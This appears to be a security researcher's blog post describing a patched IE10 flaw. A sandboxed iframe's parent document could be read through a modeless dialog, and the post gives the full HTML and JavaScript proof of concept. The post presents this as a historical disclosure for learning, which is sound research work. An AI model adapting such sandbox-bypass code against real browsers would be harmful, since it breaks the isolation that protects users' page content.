IE10 Sandbox Bypass Using a Window as a Bridge

After playing around with the IE10 sandbox for a while, I noticed that a fully sandboxed iframe could be used as a stepping stone to access the parent DOM through a modeless dialog. The trick was to pass the parent window reference as the dialog argument, then read the parent’s document from inside the dialog.

<!-- index.html: parent page -->
<iframe sandbox src="sandboxed.html"></iframe>
<input type="button" value="Access normally (ACCESS DENIED)" onclick="normal()">
<input type="button" value="Access via modeless (BYPASS SandBox)" onclick="modeless()">
<script>
function normal()
{
    alert(window[0].document);
}
function modeless()
{
    win = showModelessDialog("read_opener_iframe.html", window, "dialogwidth=100px;dialogheight=100px");
}
</script>

<!-- read_opener_iframe.html: dialog reads the sandboxed iframe's parent -->
<script>
alert(dialogArguments[0].document.URL + '\n\n' + dialogArguments[0].document.body.outerHTML);
window.close();
</script>

The sandboxed iframe itself was completely inert — but by opening a modeless dialog and handing it the parent window object as dialogArguments, the dialog ran outside the sandbox context and could freely read the parent document. This showed that the sandbox boundary was not being enforced across the modeless dialog bridge.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE9: Bypassing iFrame security=restricted via XML Stylesheet] :: [UXSS: Mixing Document Mode Across Tridents Using MHT] >